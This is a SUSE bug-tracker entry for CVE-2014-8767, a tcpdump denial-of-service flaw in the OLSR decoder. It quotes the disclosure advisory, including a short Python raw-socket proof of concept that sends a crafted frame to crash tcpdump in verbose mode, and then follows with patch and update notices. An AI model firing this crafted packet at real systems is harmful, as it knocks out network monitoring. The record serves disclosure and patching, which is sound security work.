905870 – (CVE-2014-8767) VUL-0: CVE-2014-8767: tcpdump: denial of service in verbose mode using malformed OLSR payload

Bug 905870 (CVE-2014-8767) - VUL-0: CVE-2014-8767: tcpdump: denial of service in verbose mode using malformed OLSR payload

Summary: VUL-0: CVE-2014-8767: tcpdump: denial of service in verbose mode using malfor...

Status:	RESOLVED FIXED

Alias:	CVE-2014-8767

Product:	SUSE Security Incidents
Classification:	Novell Products
Component:	Incidents (show other bugs)
Version:	unspecified
Hardware:	Other Other

Priority:	P3 - Medium Severity: Minor
Target Milestone:	---
Deadline:	2014-12-16
Assignee:	Security Team bot
QA Contact:	Security Team bot

URL:
Whiteboard:	maint:released:sle11-sp1:59704 maint:...
Keywords:

Depends on:
Blocks:

Clone This Bug

Reported:	2014-11-18 08:32 UTC by Johannes Segitz
Modified:	2017-05-08 16:12 UTC (History)
CC List:	2 users (show)

See Also:
Found By:	---
Services Priority:
Business Priority:
Blocker:	---
Marketing QA Status:	---
IT Deployment:	---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Johannes Segitz 2014-11-18 08:32:38 UTC

Date: Tue, 18 Nov 2014 06:03:16 +0100
From: Steffen Bauch <mail@steffenbauch.de>

CVE-2014-8767 tcpdump denial of service in verbose mode using
malformed OLSR payload

1. Background

tcpdump is a powerful command-line packet analyzer. It allows the user
to intercept and display TCP/IP and other packets being transmitted or
received over a network to which the computer is attached.

2. Summary Information

It was found out that malformed network traffic (OLSR-based) can lead
to an application crash (denial of service) if verbose output of
tcpdump monitoring the network is used.

3. Technical Description

The application decoder for the OLSR protocol fails to perform
external input validation and performs insufficient checking on length
computations leading to an unsafe decrement and underflow in the
function

olsr_print (const u_char *pptr, u_int length, int is_ipv6)

In this function msg_len is extracted from the input without
sufficient checks and subtracted sizeof(struct olsr_msg4) which leads
to an underflow of msg_tlen which is used to call
olsr_print_neighbor() which will crash. In case DNS reverse lookup is
enabled, this will also lead to a large amount of invalid DNS reverse
lookups.

To reproduce start tcpdump on a network interface

sudo tcpdump -i lo -s 0 -n -v

(running the program with sudo might hide the segfault message on
certain environments, see dmesg for details)

and use the following python program to generate a frame on the
network (might also need sudo):

#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))

olsr_frame =
"\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x
20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"

s.send(olsr_frame)

4. Affected versions
Affected versions are 3.9.6 through 4.6.2

5. Fix
The problem is fixed in the upcoming version tcpdump 4.7.0

So SLE 11, 12 and all openSUSE variants

Comment 1 Swamp Workflow Management 2014-11-18 10:32:25 UTC

An update workflow for this issue was started.
This issue was rated as low.
Please submit fixed packages until 2014-12-16.
When done, reassign the bug to security-team@suse.de.
https://swamp.suse.de/webswamp/wf/59702

Comment 2 Swamp Workflow Management 2014-11-18 23:00:13 UTC

bugbot adjusting priority

Comment 3 Vítězslav Čížek 2014-12-08 16:15:01 UTC

openSUSE updates will be started once 4.7.0 is out.

Comment 5 Swamp Workflow Management 2014-12-23 18:06:06 UTC

SUSE-SU-2014:1692-1: An update that fixes two vulnerabilities is now available.

Category: security (low)
Bug References: 905870,905872
CVE References: CVE-2014-8767,CVE-2014-8769
Sources used:
SUSE Linux Enterprise Server 11 SP3 for VMware (src):    tcpdump-3.9.8-1.23.1
SUSE Linux Enterprise Server 11 SP3 (src):    tcpdump-3.9.8-1.23.1
SUSE Linux Enterprise Desktop 11 SP3 (src):    tcpdump-3.9.8-1.23.1

Comment 6 Swamp Workflow Management 2014-12-29 10:05:00 UTC

SUSE-SU-2014:1723-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 905870,905871,905872
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769
Sources used:
SUSE Linux Enterprise Server 12 (src):    tcpdump-4.5.1-4.1
SUSE Linux Enterprise Desktop 12 (src):    tcpdump-4.5.1-4.1

Comment 7 Vítězslav Čížek 2015-01-19 12:49:08 UTC

(In reply to Vitezslav Cizek from comment #3)
> openSUSE updates will be started once 4.7.0 is out.

JFYI, tcpdump 4.7.0 is still not released yet.

Comment 9 Bernhard Wiedemann 2015-02-06 13:00:08 UTC

This is an autogenerated message for OBS integration:
This bug (905870) was mentioned in
https://build.opensuse.org/request/show/284471 13.2+13.1 / tcpdump

Comment 10 Swamp Workflow Management 2015-02-13 15:04:51 UTC

openSUSE-SU-2015:0284-1: An update that fixes three vulnerabilities is now available.

Category: security (moderate)
Bug References: 905870,905871,905872
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769
Sources used:
openSUSE 13.2 (src):    tcpdump-4.6.2-4.1
openSUSE 13.1 (src):    tcpdump-4.4.0-2.4.1

Comment 11 Victor Pereira 2015-02-13 20:32:23 UTC

released

Comment 12 Swamp Workflow Management 2017-04-26 19:09:12 UTC

SUSE-SU-2017:1110-1: An update that fixes 49 vulnerabilities is now available.

Category: security (moderate)
Bug References: 1020940,1035686,905870,905871,905872,922220,922221,922222,922223,927637
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769,CVE-2015-0261,CVE-2015-2153,CVE-2015-2154,CVE-2015-2155,CVE-2015-3138,CVE-2016-7922,CVE-2016-7923,CVE-2016-7924,CVE-2016-7925,CVE-2016-7926,CVE-2016-7927,CVE-2016-7928,CVE-2016-7929,CVE-2016-7930,CVE-2016-7931,CVE-2016-7932,CVE-2016-7933,CVE-2016-7934,CVE-2016-7935,CVE-2016-7936,CVE-2016-7937,CVE-2016-7938,CVE-2016-7939,CVE-2016-7940,CVE-2016-7973,CVE-2016-7974,CVE-2016-7975,CVE-2016-7983,CVE-2016-7984,CVE-2016-7985,CVE-2016-7986,CVE-2016-7992,CVE-2016-7993,CVE-2016-8574,CVE-2016-8575,CVE-2017-5202,CVE-2017-5203,CVE-2017-5204,CVE-2017-5205,CVE-2017-5341,CVE-2017-5342,CVE-2017-5482,CVE-2017-5483,CVE-2017-5484,CVE-2017-5485,CVE-2017-5486
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP2 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Software Development Kit 12-SP2 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    libpcap-1.8.1-9.1
SUSE Linux Enterprise Server for Raspberry Pi 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Server 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Server 12-SP1 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Desktop 12-SP2 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1
SUSE Linux Enterprise Desktop 12-SP1 (src):    libpcap-1.8.1-9.1, tcpdump-4.9.0-13.1

Comment 13 Swamp Workflow Management 2017-05-08 16:12:47 UTC

openSUSE-SU-2017:1199-1: An update that fixes 49 vulnerabilities is now available.

Category: security (moderate)
Bug References: 1020940,1035686,905870,905871,905872,922220,922221,922222,922223,927637
CVE References: CVE-2014-8767,CVE-2014-8768,CVE-2014-8769,CVE-2015-0261,CVE-2015-2153,CVE-2015-2154,CVE-2015-2155,CVE-2015-3138,CVE-2016-7922,CVE-2016-7923,CVE-2016-7924,CVE-2016-7925,CVE-2016-7926,CVE-2016-7927,CVE-2016-7928,CVE-2016-7929,CVE-2016-7930,CVE-2016-7931,CVE-2016-7932,CVE-2016-7933,CVE-2016-7934,CVE-2016-7935,CVE-2016-7936,CVE-2016-7937,CVE-2016-7938,CVE-2016-7939,CVE-2016-7940,CVE-2016-7973,CVE-2016-7974,CVE-2016-7975,CVE-2016-7983,CVE-2016-7984,CVE-2016-7985,CVE-2016-7986,CVE-2016-7992,CVE-2016-7993,CVE-2016-8574,CVE-2016-8575,CVE-2017-5202,CVE-2017-5203,CVE-2017-5204,CVE-2017-5205,CVE-2017-5341,CVE-2017-5342,CVE-2017-5482,CVE-2017-5483,CVE-2017-5484,CVE-2017-5485,CVE-2017-5486
Sources used:
openSUSE Leap 42.2 (src):    libpcap-1.8.1-7.3.1, tcpdump-4.9.0-6.3.1
openSUSE Leap 42.1 (src):    libpcap-1.8.1-8.1, tcpdump-4.9.0-7.1